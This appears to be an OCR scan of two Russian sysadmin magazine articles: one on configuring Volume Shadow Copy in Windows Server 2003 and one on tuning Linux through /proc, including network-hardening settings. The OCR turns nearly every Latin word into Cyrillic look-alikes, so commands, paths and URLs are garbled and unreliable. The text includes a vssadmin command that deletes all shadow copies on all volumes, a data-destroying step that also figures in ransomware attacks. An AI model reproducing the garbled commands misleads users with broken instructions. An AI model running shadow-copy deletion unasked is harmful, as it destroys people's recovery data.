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ИНН 7729410015 ООО «Гейм Лэнд» 

АБ «ОРГРЭСБАНК», г. Москва 
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Плательщик 
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Сумма 


Оплата журнала « 
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>> ХАКЕР. РКО 




Движение в тени 



ТЕНЕВОЕ КОПИРОВАНИЕ В ѴѴІЫ00ѴѴ5 2003 5ЕКѴЕР 



У системного администратора довольно много обязанностей, но среди них особо стоит отметить процеду- 
ру резервирования данных. Причиной потери информации часто являются не системные сбои, а его вели- 
чество пользователь, который вечно умудряется случайно удалить важный файл, перезаписать его другой 
версией, переместить неизвестно куда. А вот поиском и восстановлением приходится заниматься админу, 
который, если с файлом что-то случится, останется, скорее всего, и виноват. А вдруг утраченных файлов 
несколько? 



СЛУЖБА Ѵ0І.ІІМЕ 5НА00ѴѴ СОРУ 

В \Ѵіп2кЗ (а также ХР и Ѵізіа) появилась служба теневого копирования 
тома (Ѵоіите ЗЬасІоѵѵ Сору Зегѵісе), которая позволяет решить львиную 
долю проблем, связанных с восстановлением небольшого числа файлов из 
резервной копии. Кроме того, служба ѴЗЗ также предоставляет возмож- 
ность на лету архивировать открытые или блокированные файлы, что 
особенно полезно в тех программах (М3 ЗС^Ь Зегѵег, М3 ЕхсЬап§е), кото- 
рые не имеют самостоятельного механизма резервирования и которые 
приходится останавливать для создания резервной копии. 

Но это еще не все. Представим другую типичную ситуацию: удален файл 
на сетевом ресурсе. В корзину он точно не попадает, поэтому его восста- 
новление потребует титанических усилий и, возможно, остановки той 
системы, на диске которой находился удаленный файл. Иначе на его место 
запросто может быть записана другая информация. При работающей ѴЗЗ 
восстановить с ее помощью последнюю копию файла будет невозможно. 
Зато можно вернуться к ее предыдущим копиям, которые могут несильно 
отличаться от оригинала, соответственно, суммарное время на восстанов- 
ление последней версии и затраченные при этом усилия будут на порядок 
меньше. На практике именно эта возможность и является определяющей 
при выборе ЗЬабо^ѵ Сору. С ѴЗЗ пользователям уже нет необходимости 
привлекать администратора для восстановления потерянной информа- 
ции. При наличии соответствующих прав доступа они могут самостоя- 



тельно разобраться с проблемой, в любое время обратившись к резервной 
копии тома. 

Стоит помнить, что служба ѴЗЗ — это не альтернатива резервному копи- 
рованию, а, скорее, удобное дополнение, помогающее быстро разобраться 
с мелкими неприятностями. К сожалению, зачастую администраторы 
даже не подозревают о присутствии этой службы. Обычно они просто 
прибегают к использованию софта сторонних производителей. 

ПРИНЦИП РАБОТЫ Ѵ55 

С заданным администратором интервалом (или по требованию) ѴЗЗ 
делает снимок общих ресурсов, расположенных на томе ШТЗ, и сохраняет 
копию тех данных, которые изменились с момента последнего тенево- 
го копирования. Администратор определяет периодичность создания 
теневых копий и количество дискового пространства, которое разрешено 
использовать для их хранения. При превышении установленного лимита 
более старые версии подменяются новыми. Изменения сохраняются не на 
уровне файлов, а на уровне блоков. В моментальных снимках содержится 
информация об изменениях (по сравнению с предыдущим снимком) . 
Поэтому пространство, необходимое для хранения такой информации, 
значительно меньше, чем можно было бы подумать. Хотя и его стоит 
учитывать, планируя использование дисковых ресурсов, так как при акти- 
визации ѴЗЗ на томе под его нужды требуется выделить не менее 100 Мб. 
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Активация теневых копий 




Установка расписания теневого копирования 



Сохраняются такие копии в области диска, которая называется кэшем 
теневых копий, а сам том, на котором находится этот кэш, именуется томом 
хранения теневой копии. По умолчанию он создается на том же томе, что 
и источник, но для повышения отказоустойчивости и быстродействия его 
можно размещать на отдельном физическом диске. Перед активизацией 
следует заранее определиться с местом хранения кэша, потому что впослед- 
ствии его нельзя будет переместить, не потеряв уже имеющиеся момен- 
тальные снимки. В теневых копиях сохраняются также разрешения ГѵГГРЗ и 
шифрование, что может вызвать проблемы при восстановлении файла. 
Функция теневого копирования предназначена для использования с 
протоколом СІР5 (Соттоп ІШегпеІ: Рііе ЗузГет), поэтому, чтобы получить 
доступ к предыдущим версиям файла или каталога на выбранном ресурсе, 
подключаться к нему нужно через общую папку. Даже после локальной 
регистрации на сервере необходимо использовать путь ІЛМС (Ііпіѵегзаі 
Матіп§ Сопѵепгіоп) . 

В версиях \Ѵіп2кЗ Ешегргізе и ПаГасеШег ЕсНгіоп есть довольно простая воз- 
можность копировать или перемещать информацию в сети хранения ЗАЛ. 
В этом случае ѴЗЗ может легко импортировать большие объемы данных из 
ЗАЫ на сервер, хотя эта реализация зависит от конкретного производителя 
системы хранения. 

Физически кэш находится в скрытой системной папке ЗузГетѴоІите 
Іпіогтагіоп и невидим для пользователей. Это одна из причин, почему служ- 
бу ѴЗЗ можно активизировать только на томах с файловой системой ГѵГГРЗ . 
Под держивается весь том целиком и нельзя что-либо исключить или указать 
на конкретные файлы или каталоги. Поэтому, если на некотором разделе на- 
ходится каталог, к которому предоставлен общий доступ, придется включать 
теневое копирование для всего раздела. Если затем в этом же разделе создать 
еще один общий ресурс, то предыдущие версии файлов будут доступны с 
момента открытия доступа. Также следует знать, что теневое копирование 
использует те же разрешения, что были установлены при создании теневой 
копии. То есть, если мы создали теневую копию, а потом изменили права дос- 
тупа, добавили или удалили пользователей и/или группы, то они будут иметь 
все необходимые права для текущих версий файлов/каталогов. Старые тене- 
вые копии будут продолжать использовать ранее назначенные разрешения. 
Чтобы скопировать, посмотреть или восстановить файл, необходимы права, 
действующие на момент создания теневой копии. 



Также следует помнить, что ѴЗЗ не работает для тошП роіш. Данные на 
смонтированных ресурсах не будут включены в теневую копию. Поэтому 
на каждом из них также должна быть запущена служба ѴЗЗ . 

Сами копии доступны как обычные файлы в том виде, который они имели 
некоторое время назад — будь то день, неделя или месяц. Поддерживается 
до 64 снимков, то есть фактически, особо не напрягаясь, можно одновре- 
менно иметь до 64 версий одного и того же файла, которые легко извлека- 
ются и восстанавливаются. Впрочем, при нехватке дискового пространст- 
ва версий файлов может быть и меньше. 

Размещать теневые копии на системном или загрузочном томе не стоит, 
так как файлы операционной системы постоянно меняются, и количество 
копий может быть чересчур большим. Да и особого смысла в этом нет. 
Поэтому рекомендуется включать ѴЗЗ только на тех томах, где хранятся 
пользовательские данные или нужна возможность постоянного архивиро- 
вания открытых файлов. 

ВКЛЮЧЕНИЕ Ѵ55 

Включить теневое копирование общего ресурса можно, как минимум, 
двумя способами. Первый — открыть «Мой компьютер», выбрать свойства 
нужного диска и перейти на вкладку «Теневые копии» (5ЬасІо\ѵ сору) . 
Второй — в оснастке ММС «Управление компьютеров» перейти на вкладку 
«Запоминающие устройства» — «Управление дисками» и в контекстном 
меню нужного диска выбрать пункт «Свойства». Какой бы способ из этих 
двух ты ни предпочел, окно откроется одно и то же, поэтому выбранный 
вариант никак не влияет на дальнейшие действия. Второй способ удобнее 
при удаленном управлении, а при работе с локальными ресурсами лучше 
использовать «Мой компьютер». 

По умолчанию теневое копирование для всех дисков отключено. Его состоя- 
ние можно узнать в поле «Время следующего запуска». Нажатие на кнопку 
«Создать» позволит вручную создать теневую копию выбранного раздела, 
даже без активации службы ѴЗЗ. В окне напротив появится дата и время 
создания теневой копии, а в поле «Использовано» будет показан размер, 
занимаемый теневой копией. Но прямо сейчас этого делать не стоит, ведь 
как только будет создана первая теневая копия раздела, изменить месторас- 
положение кэша будет уже невозможно. Придется все удалить и повторить 
действия. Соответствующий пункт в настройках будет заблокирован. 
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Утилита Ѵззасітіп 




Просмотр доступных версий файла 










> ѵѵагпіпд 

Прежде чем акти- 
визировать службу 
Ѵ55, необходимо оп- 
ределиться с местом 
для хранения кэша 
теневых копий, так 
как впоследствии 
кэш нельзя пере- 
местить, не потеряв 
содержащиеся в 
нем моменталь- 
ные снимки, а при 
отключении Ѵ55 на 
томе будут уда л е н ы 
все существующие 
теневые копии. 



Перед активацией автоматического режима создания 
теневых копий следует нажать кнопку «Параметры». В поя- 
вившемся окне всего несколько настроек. Так в поле «Том» 
показывается имя ресурса, на котором создается теневая 
копия, изменить его, естественно, нельзя. В поле «Место 
хранения» в раскрывающемся списке «Расположено на 
томе» выбираем ресурс, на котором будет сохраняться кэш. 
Нажатие на кнопку «Сведения» позволит получить инфор- 
мацию о наличии места, отведенного под кэш на выбранном 
томе (если там уже включено теневое копирование) . При 
помощи переключателя «Максимальный размер» указыва- 
ем ограничение на размер данных в теневой копии. Здесь 
нужно задать цифру в мегабайтах, но если места на диске 
много, то можно выбрать и вариант «Не ограничен». Нажав 
кнопку «Расписание», можно указать, как часто должны 
создаваться теневые копии. В настройках по умолчанию те- 
невое копирование производится два раза в будний день — в 
7:00 и 12:00. Можно установить любое количество заданий, 
выполняющихся в разный период времени (однократно, 
ежедневно, ежемесячно, при простое, включении или вы- 
ключении компьютера) с точностью до минуты. Создавать 
теневые копии чаще, чем раз в час, вряд ли целесообразно. 
Закончив установки, выходим нажатием «ОК», нажимаем 
кнопку «Включить» для активации автоматического созда- 
ния теневых копий и при помощи «Создать» делаем первую 
копию вручную. При активном автоматическом теневом 
копировании значок возле этого тома должен измениться: 
теперь на нем изображены часы. 

Если что-то не будет получаться, обрати внимание во 
вкладке «Службы» на состояние службы «Теневое ко- 
пирование тома» (название процесса ѵззѵс.ехе). Если 
она остановлена, теневые копии томов для восстанов- 
ления не будут доступны, и архивация и восстанов- 
ление могут не работать. По умолчанию тип запуска 
установлен «Вручную», что и является рекомендуемым 
значением. Также для нормального функционирова- 
ния Ѵ35 требует работы службы «Удаленный вызов 
процедур (ВРС)». 



ПРИМЕНЕНИЕТЕНЕВОГО КОПИРОВАНИЯ 

Работать с ресурсами, использующими ЗЬасіоѵѵ Сору, 
можно в операционных системах, начиная от ѴѴіп985Е. 

Но только в ѴѴіпХР Рго 5Р2, ѴѴіп2кЗ и Ѵійа есть все необхо- 
димое клиентское ПО. Для ѴѴіп2к 5РЗ, МіпХР и ѴѴіп985Е 
придется устанавливать его дополнительно. Для ѴѴіпХР 
Рго нужный файл можно взять с ѴѴіп2кЗ (%ѴѴіпс1іг%\ 
5у5Иет32\СІіепЩ\Т\ѵс1іепІ:\Х86, файл 1ѵѵс1і32.т5І) . Уни- 
версальный пакет доступен на сайте МісгозоЛ (ГесЬпеИ. 
тісго5обі:.сот/ги-ги/\ѵіпсіо\ѵ55егѵег/ЬЬ405951 (еп-ш) . 
азрх) . Для ѴѴіп98 и ѴѴіп2к для установки МЗІ файла понадо- 
бится ѴѴіпбоѵѵз Іпзіаііег, который можно взять по ссылкам 
яо.тісго501Цсот/1ѵѵ1іпк/?ЕіпкІс1= 14763 и ео.тісгозоіТ. 
сот/Міпк/?ІіпкІс1= 14429 (соответственно). Если установ- 
лена Асгіѵе БігесШгу, удобнее развернуть клиент через Сгоир 
роіісу. 

Теперь, когда клиент готов, заходим на нужный сетевой 
ресурс (при локальном просмотре функция не работает), вы- 
бираем файл, предыдущую версию которого хотим получить, 
и в диалоговом окне «Свойства» переходим на вкладку «Пре- 
дыдущие версии» (если такой вкладки нет, значит, теневые 
копии не включены) . Здесь будут показаны все версии файла, 
доступные в кэше, с датой и временем создания. Чтобы 
просмотреть нужную, отмечаем ее и нажимаем кнопку 
«Показать». Предыдущие версии файла доступны только для 
чтения, вносить изменения в них нельзя. При помощи двух 
других кнопок файл можно копировать или восстановить. 
Если список предыдущих версий файла пуст, это значит, что 
файл не изменялся с момента создания первой его копии. 

А что делать, если файл был удален? Тогда он не выводит- 
ся в каталоге в списке файлов и выбрать его свойства не 
получится. Ничего страшного. Выбираем свойства каталога, 
в котором хранился файл. Также, каки для файла, можно 
выбрать предыдущие копии, копировать информацию или 
восстановить состояние. Но помни, что при выборе пункта 
«Восстановить» будут утеряны все изменения для всех объек- 
тов каталога! Лучше всего создать новый файл и скопировать 
в него всю информацию со старой версии. 
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ОТКАЗ ОТ ТЕНЕВОГО КОПИРОВАНИЯ 

При необходимости (например, для освобождения дискового пространст- 
ва) ненужные теневые копии можно удалить или вообще отказаться от их 
использования. Чтобы удалить ненужные теневые копии, следует перей- 
ти во вкладку «Теневые копии», отметить их и нажать кнопку «Удалить». 
Если же на выбранном томе не нужна сама функция теневого копиро- 
вания, то в этой же вкладке отключаем функцию нажатием соответст- 
вующей кнопки. В появившемся диалоговом окне подтверждаем свои 
действия. После этого старые теневые копии будут удалены, а новые 
создаваться уже не будут. 

ТЕНЕВЫЕ КОПИИ ОБЩИХ ПАПОК В КЛАСТЕРЕ 

Функция теневых копий работает и в кластерной среде. Причем, 
реализовать ее поддержку в этом случае достаточно просто. Для этого 
необходимо выполнить лишь несколько шагов. Сначала создаем на 
одном из узлов кластера управляемый кластером файловый ресурс 
общего доступа. Запускаем консоль «Администратор кластеров» и 
создаем ресурс «Физический диск» для диска, на котором расположена 
общая папка, а также ресурсы «Сетевое имя» и «ІР-адрес», если они еще 
не созданы, и помещаем их в туже группу ресурсов. Обязательно на- 
страиваем созданный ресурс общего доступа таким образом, чтобы он 
был зависим от ресурса «Физический диск», управляющего теневыми 
копиями, и от ресурса «Сетевое имя» для данного общего ресурса. Пе- 
реходим в консоль «Управление компьютером», в узле «Общие папки» 
выделяем пункт «Все задачи» и выбираем команду «Настроить теневые 
копии». Далее отмечаем том, на котором требуется включить теневое 
копирование общих папок, и нажимаем кнопку «Включить». Правда, 
это было нетрудно? 

ТЕНЕВОЕ КОПИРОВАНИЕ В КОМАНДНОЙ СТРОКЕ 

Управлять теневым копированием можно, используя утилиту командной 
строки Ѵззабтіп. Поэтому скажу пару слов о работе с ней. Например, что- 
бы создать новую теневую копию для диска О, используем такую команду: 

> Ѵззабтіп Сгеабе ЗЬасІоѵ? /Рог=Б: 

В качестве параметра для Рог можно указать как букву диска, так и точку 
подключения. Если запущен другой процесс создания теневой копии, 
получим ошибку. В этом случае нужно дополнительно задать параметр 
АшюКейу с указанием времени в минутах, в течение которых будет повто- 
ряться попытка создания теневой копии. 

> Ѵззабіпіп Сгеабе Зйаскж /Рог=Б: /АибоКебгу=10 

Удалить все копии для тома можно, применив Беіеіе ЗЬабомге. Дополни- 
тельных параметров здесь несколько больше. Так том можно указать, 
использовав букву диска или ГО теневой копии (его получишь, введя 
«Ѵззабтіп ЫзТ Зйасіоч/ѵз») . Если планируется удаление всех теневых копий 
на всех томах, используем АН: 

> Ѵззабшіп Беіебе Зйаскжз /АН 

Чтобы удалить лишь самую старую теневую копию на томе, введем: 

> Ѵззабіпіп Беіебе Зйаскжз /Рог=Б: /Оібезб 
Посмотрим список ресурсов, выводимых командой Ілзі ЗЬабочлгс: 

>Ѵзза<±піп Ызб ЗЬаскжз 

Содержимое для ІБ набора теневых копий: {с534б555-ЬсЬб- 
4153-8б14-7а56ее01710б} 

Содержит 1 теневых копий на время создания: 31.12.2007 
13:12:22 

ІБ теневой копии: {41(399472-1713-41а8-8735- 




Настройка параметровтеневого копирования 

58б8Ь59баа0а} 

Исходный том: (Б: ) \\?\Ѵо1ише{4353404а-а41б-11с1с-ЬасЗ- 
806ебб6е6963}\ 

Том теневой копии: \\?\СЬ0ВАБЕ00Т\Беѵісе\НагббізкѴо1ит 
еЗЬаскжСоруІ 

Размещающий компьютер : зегѵег.сош 
Обслуживающий компьютер: зегѵег.сош 

Поставщик: "Місгозобб Зоббмаге ЗЬасІоѵ? Сору ргоѵібег 1.0" 
Тип: СІіепбАссеззіЫе 

Атрибуты: Сохранение, Доступно клиентам, Без автомати- 
ческого освобождения, Без компонентов записи, Разностная 

В третьей строке указан искомый ГО. Если для удаления теневых копий 
используется ГО, то с его помощью можно удалить те, которые имеют тип 
СІіепіАссеззіЫе. Место хранения теневых копий для выбранного тома 
указывается при помощи параметра АсЫ ЗЬасІоѵѵЗіюга^е: 

> Ѵззабшіп А<М ЗкаскжЗбогаде /Рог=Б: /Оп=Е: / 
МахЗіге=700МВ 

Введенный лимит дискового пространства после установки можно 
изменить при помощи Кезіге ЗЬабошЗШга^е. Запустив утилиту Ѵззасітіп 
с параметром Ілзб Ѵоіитез, можно получить список томов, на которых 
доступна активация теневых копий. Для удаления связи между исходным 
томом и томом хранения теневых копий следует использовать Беіеіе 
ЗЬаботЗЮгаде : 

> Ѵззабшіп Беіебе ЗЬасктЗбогаде /Рог=Б: /Оп=Е: 

Для получения списка всех связей нужно ввести Іій ЗЬабоѵѵЗшга^е. Спи- 
сок приложений, использующих теневые копии, получаем при помощи 
1і&ѴѴгі(ег8. 

ЗАКЛЮЧЕНИЕ 

Восстановить или получить предыдущую версию файла при помощи Ѵ35 
очень просто. Операцию освоит пользователь с любым уровнем подго- 
товки, и это сэкономит время и нервы не только ему, но и администра- 
тору. Учитывая, что Ѵ55 настраивается несколькими щелчками мышки, 
отказываться от использования службы стоит лишь в исключительных 
случаях. ЕЕ 
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Секреты горячего 

АДМИНИСТРИРОВАНИЯ 

ИСПОЛЬЗОВАНИЕ /РРОС ДЛЯ АДМИНИСТРИРОВАНИЯ ЫЫОХ-СЕРВЕРА 



Довольно банальная ситуация: есть сервер, поддерживающий горячую замену дисков. Ты «налету» добав- 
ляешь накопитель, но как сделать, чтобы система его увидела без перезагрузки? О виртуальной файловой 
системе /ргос, позволяющей изменять установки ядра Ілпих без перезагрузки системы, о способах проти- 
водействия сетевым атакам и о магических клавишах ЗузКц мы поговорим в этой статье. 



КРАТКО О /РРОС 

Псевдофайловая система /ргос — это специальный механизм, позволяю- 
щий посылать данные ядру, модулям и процессам (кстати, «ргос» — сокра- 
щение от «ргосезз») . С ее помощью можно получить инфу о процессах и 
изменять параметры ядра и его модулей «на ходу». Также она может быть 
полезна для мониторинга производительности, проверки системной ин- 
формации, конфигурирования системы и изменения конфигурации. Что 
интересно, /ргос находится не на жестком диске, а в оперативной памяти, 
кроме того, она создает свои файлы и каталоги на основании информации, 
полученной от ядра. Так как вся работа идет на уровне ѴРЗ (ѴігШаІ Рііе 
Бузует Іауег), для пользователей /ргос выглядит как обычная файловая 
система. 

Вывести на экран текущее значение переменной можно с помощью 
команды саС: 

# саЬ /ргос/путь/файл [ | Іезз] 

Изменить параметр системы можно путем записи нового значения пара- 
метра в соответствующий файл: 



# есЬо "значение" > /ргос/путь/файл 

В /ргос много информационных файлов, мы выделим лишь некоторые: 
•/ргос/ѵеггіоп — версия ядра. 

• /ргос/ стгіііпе — список параметров, переданных ядру при загрузке. 
•/ргос/сриіпТо — информация о процессоре . 

• /ргос/тетіпТо — информация об использовании оперативной памяти 
(почти тоже, что и команда Тгее) . 

•/ргос/гіеѵісез — список устройств . 

• /ргос/ТіІегуг'Іетг — файловые системы, которые поддерживаются 
твоей системой. 

• /ргос/гтпоип*г — список подмонтиров энных файловых систем. 

•/ргос/ гп о сі иі е г — список загруженных модулей . 

• /ргос/ 5 ѵарг — список используемых разделов и файлов подкачки. 

ПАРАМЕТРЫ ЯДРА 

В каталоге /ргос/зуз/кегпеі находятся файлы, позволяющие изменять 
важные параметры ядра. Перечислим самые интересные из них: 
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Использование памяти Поддерживаемые файловые системы 



• сІгІ-аИ-сІеІ — задает реаіщию на нажатие комбинации 

< СТгІЧ-АІТ + Оеі > . Может содержать значение 0 («мягкая перезагрузка», 
при которой управление передается программе іпіО или 1 («жесткая» 
перезагрузка, практически равнозначная нажатию Кезеі, потому что 
никаких действий по деинициализации системы не производится) . 

• гіотаіппате — содержит сетевое доменное имя. 

• Ь о 2 \ п а гп е — содержит имя хоста. 

• ппгдтах — максимальный размер сообщения (в байтах), которое может 
быть передано от одного процесса к другому при межпроцессном взаимо- 
действии. Значение по умолчанию: 8192. Если увеличить это значение, 

то увеличится размер оперативной памяти, занимаемый операционной 
системой. 

• рапіс — время в секундах, в течение которого ядро будет ждать, прежде 
чем перезагрузить систему после вывода сообщения «кегпеі рапіс». По 
умолчанию — 0, то есть перезагрузка не производится. 

• ргіпік — определяет, куда, в зависимости от их важности, будут 
направлены сообщения. В файле содержатся четыре значения, на- 
пример, 6417 (по умолчанию) . Первое значение задает, сообщения с 
каким уровнем должны быть выведены на консоль (Сопзоіе Ьо§ Ьеѵеі) . 
Если уровень сообщения «6» и ниже, то это важные сообщения, и они 
будут выведены на консоль (чем меньше число, тем больше приори- 
тет) . Второе значение определяет важность сообщений, для которых 
не указано значение приоритета, то есть задает уровень приоритета 
по умолчанию. Третье значение задает номер самого высокого при- 
оритета (это 1) . Четвертое значение — это значение по умолчанию 
для первого. Более подробную информацию обо всем этом можно 
почерпнуть в зуз1о§(2). 

• зЬппаІІ — максимальный размер (в байтах) разделяемой памяти, значе- 
ние по умолчанию: 2097152. 

• г Ь тах — максимальный размер сегмента памяти (в байтах), допускае- 
мый ядром. По умолчанию: 33554432. 

• гЬгтппппі — максимальное число сегментов разделяемой памяти. По 
умолчанию: 4096. 

• 5 у гг ц — активизирует ЗузІЦ (смотри дальше), если не равно 0. 

• ІЬг еайг-тах — максимальное число используемых ядром потоков. По 
умолчанию: 2048. 

Для примера включим клавиши ЗузКхр 

# есію "1" > /ргос/зуз /кегпеі /зузгд 



ПАРАМЕТРЫ ФАЙЛОВЫХ СИСТЕМ 

В каталоге /ргос/зуз /1з ты найдешь файлы, влияющие на работу файловой 
системы: 

• Гііе-гпах — максимальное число одновременно открытых файлов, по 
умолчанию: 4096. 

•іпогіе-тах — максимальное число одновременно открытых инодов, по 
умолчанию: 4096. 

• гирег-тах — максимальное количество заголовков суперблоков. У 
каждой подмонтированной файловой системы есть суперблок, следова- 
тельно, максимальное количество суперблоков равно максимальному 
количеству одновременно смонтированных файловых систем. Значение 
по умолчанию: 256. 

• гирег-пг — текущее количество суперблоков (файл используется только 
для чтения, писать в него нельзя) . 

СЕТЕВЫЕ ПАРАМЕТРЫ 

Каталог /ргос/зуз/пеі: содержит файлы, влияющие на работу сети: 

• соге/те2гаде_Ьиг5* — можно использовать для предотвращения ПоЗ- 
атаки, когда система заваливается сообщениями. Определяет в десятых 
долях секунды время, которое необходимо для записи нового сообщения. 
Остальные сообщения, полученные за этот период, будут проигнорирова- 
ны. По умолчанию: 50 (5 секунд). 

• соге/те25аде_согі: — значимость каждого сообщения. Чем выше зна- 
чение, тем больше сообщений будет проигнорировано. По умолчанию: 5. 

• сог е /п ѵ_гп а х_Ьа с кі о д — максимальное число пакетов в очереди 
на обработку. Позволяет установить максимум, если сетевой интерфейс 
получает пакеты быстрее, чем ядро может их обработать. По умолчанию : 
300. 

• с о г е /о р 1 гтп е т_пп а х — максимальный размер буфера для одного сокета 
(в байтах) . 

• соге/гтет__тах — размер буфера для буфера получения информации 
(в байтах) . 

• с о г е Лѵ т е т_т ах — размер буфера для буфера отправки информации 
(в байтах) . 

• ірѵ4/істр_есЬо_ідпоге_а11 — если«1», то игнорируются ІСМР-пакеты 
типаЕСНОКЕдИЕЗТ. 

• ірѵ4/істр_есЬо_ідпоге_Ьгоас!са5 , Іг — если «1», то игнорируются 
широковещательные ріп§’и (хорошее решение против зтші-атак!). 
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Параметры, переданные ядру при загрузке 



• ірѵ4/сопГ/*/ассер1_гоигсе_гои*е і — определяет, разрешены ли пакеты 
с маршрутизацией, задаваемой источником. Желательно отключить (зна- 
чение 0), чтобы атакующий не мог фальсифицировать ІР-адрес источника. 

• сопГ/*/гр_ГШег — отбрасывать ли пакет в том случае, если пакет 
приходит на один интерфейс, а ответ исходит из другого. Для РРР и ѴРМ 
соединений этот параметр лучше включить, так как они имеют свои собст- 
венные интерфейсы. 

• ірѵ4/сопГ/Ѵассер1_гі?і:ІігесІ5 — можно ли принимать ІСМР-перена- 
правления. Если этот параметр включен, существует вероятность того, что 
злоумышленник начнет посылать наши пакеты через машину, которую он 
контролирует. 

• ірѵ4/{істр_га*е1ітіѴістр_га , 4етагк} — ограничение частоты гене- 
рации ІСМР-пакетов. 

• і р ѵ 4 /с о п Г/*/ 1 о д _т а г Нэ п 2 — определяет, должно ли ядро посылать в 
5уз1о§ сообщения о пакетах, полученных от недопустимых адресов. 

• ірѵ4/пеідЬ/ */1осИіте — количество времени, в течение которого 
существует запись при изменении АКР адреса. Увеличение этого параметра 
может предотвратить засорение кэша АКР при атаке типа тап-іп-гКе-тіс1с11е. 

• ір ѵ4/сопГ/ */рг оху_аг р — отвечать или нет на АКР запрос, если извес- 
тен путь к запрашиваемому хосту. 

•ірѵ4/1ср_гупсоокіе2 — следует включить для против одействия 5^ - 
флуду — сетевой атаке, при которой очередь полуоткрытых запросов 
соединений быстро заполняется, что мешает установке нормальных 
соединений. 

ПАРАМЕТРЫ ВИРТУАЛЬНОЙ ПАМЯТИ 

Каталог /ргос/зуз/ѵт содержит файлы, позволяющие изменять парамет- 
ры виртуальной памяти: 

• ЬиГГегтет — позволяет управлять количеством общей системной 
памяти, которая будет использоваться как буферная память. В файле 
указываются три значения (через пробел) : минимальный, средний и 
максимальный размер памяти (в %), которая может быть использована 
для буфера. По умолчанию: 2 10 60. 

• Ггеерадег — содержит три значения, разделенные пробелами (512 768 
1024 — по умолчанию) . Если количество свободных страниц памяти до- 
стигнет первого значения, доступ к любому дополнительному количеству 
памяти будет иметь только ядро (а не другие процессы) . Если количество 
свободных страниц будет меньше второго значения (768), ядро будет 
более активно освобождать память путем свопинга. То же самое и для 
третьего значения, только ядро в этом случае будет еще активнее. 

• кгѵаріі — управляет свопингом. Каки в предыдущем случае, в этом 
файле ты найдешь три значения, разделенные пробелами (512 32 8). 
Первое значение — это максимальное количество страниц, которые 
ядро будет пытаться освободить за один раз. Второе — это минимальное 
количество попыток освобождения страницы во время свопинга. Третье 



— количество страниц, которое можно записать в своп. Чем больше это 
значение, тем больше данных будет записано на диск и меньше времени 
будет потрачено на поиск на диске. Но тут важно не перестараться, так как 
слишком большое значение произведет обратный эффект (ведь очередь 
запросов увеличится) . 

• гѵарріпегг — содержит значение коэффициента подкачки. Мини- 
мальное значение коэффициента — 0, максимальное — 100. Значение по 
умолчанию: 70. 

ГОРЯЧАЯ ЗАМЕНА ДИСКОВ С ПОМОЩЬЮ /РК0С 

Допустим, под рукой есть диски горячей замены, но как добавить дисковое 
пространство без перезагрузки системы? Даже если вставить диск без 
выключения питания, то все равно придется перезагрузить систему, чтобы 
она распознала новый диск. Однако, используя файл /ргос/зсзі/зсзі, мож- 
но заставить систему распознать новый диск «на лету» ! 

Общий формат команды таков: 

# есію "зсзі асМ-зіпдІе-сІеѵісе а Ь с сі" > /ргос/зсзі/зсзі 

Где «а» — это ГО хост адаптера (номер первого адаптера — 0), «Ь» — канал 
ЗС5І на хост адаптере (нумерация с 0), «с» — ГО 5С5І-устройства, «б» 

— номер ЫЖ. 

Сразу после этого ты сможешь монтировать файловые системы, находя- 
щиеся на только что подключенном диске. 

Для отключения ЗС5І-диска набери команду: 

# есію "зсзі гетоѵе-зіпдіе-сіеѵісе а Ь с сі" > /ргос/зсзі/ 
зсзі 

Перед вводом команды нужно размонтировать файловые системы, нахо- 
дящиеся на этом диске. 

СОХРАНЕНИЕ ИЗМЕНЕНИЙ 

Понятно, что произведенные изменения будут действовать до перезаг- 
рузки компьютера. Сохранить изменения можно с помощью программы 
зузсй, точнее с помощью конфигурационного файла /еіс/зузсіі.сопі. Фор- 
мат этого файла несколько отличается от тех команд, которые мы вводили. 
Предположим, мы ввели команду: 

# есію "50" > /ргос/зуз/ѵш/зѵ7арріпезз 

Понравилось, как система работает с таким значением коэффициента под- 
качки, и теперь ты хочешь сохранить изменения? Открой файл /еіс/зузсні. 
сопі и добавь в него строку: 

ѵш. зѵ^арріпезз = 50 



► 148 
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